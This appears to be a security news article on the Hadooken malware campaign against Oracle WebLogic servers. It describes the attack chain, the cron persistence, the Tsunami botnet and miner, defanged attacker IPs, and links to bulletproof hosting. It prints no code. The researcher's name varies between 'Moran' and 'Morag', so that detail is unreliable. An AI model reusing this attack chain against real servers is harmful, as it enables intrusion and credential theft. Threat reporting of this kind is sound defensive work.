Cybersecurity researchers have discovered a new malware campaign targeting Linux environments for illegal cryptocurrency mining.
This campaign specifically targets Oracle Weblogic servers. HadoukenAccording to cloud security company Aqua.
“Once Hadooken is executed, it drops the Tsunami malware and deploys a cryptocurrency miner,” said security researcher Assaf Moran.
The attack chain exploits known security vulnerabilities, such as weak credentials, or misconfigurations to gain an initial foothold and then execute arbitrary code on susceptible instances.
This is achieved by launching two nearly identical payloads, one written in Python and the other in a shell script, both of which are responsible for retrieving the Hadooken malware from a remote server (either “89.185.85(.)102” or “185.174.136(.)204”).
“Additionally, the shell script version iterates through various directories containing SSH data (user credentials, host information, secrets, etc.) and attempts to use this information to attack known servers,” Morag said.
“They then move laterally within an organization or across connected environments to further spread the Hadooken malware.”
Hadooken incorporates two components: a cryptocurrency miner and a distributed denial of service (DDoS) botnet called Tsunami (also known as Kaiten), which has a history of targeting Jenkins and Weblogic services deployed on Kubernetes clusters.
Additionally, the malware is responsible for establishing persistence on the host by creating a cron job that runs the cryptocurrency miner periodically at various frequencies.
Aqua notes that the IP address 89.185.85(.)102 is registered to German hosting company Aeza International LTD (AS210644), and a previous report from Uptycs in February 2024 linked it to an 8220 Gang cryptocurrency campaign exploiting flaws in Apache Log4j and Atlassian Confluence Server and Data Center.
The second IP address, 185.174.136(.)204, is currently inactive but is also linked to Aeza Group Ltd. (AS216246). As noted by Qurium and EU DisinfoLab in July 2024, Aeza is a bulletproof hosting service provider based in two data centers, Moscow M9 and Frankfurt.
“Aeza’s modus operandi and rapid growth can be explained by its recruitment of young developers who have ties to a bulletproof Russian hosting provider that provides a haven for cybercrime,” the researchers said in the report.
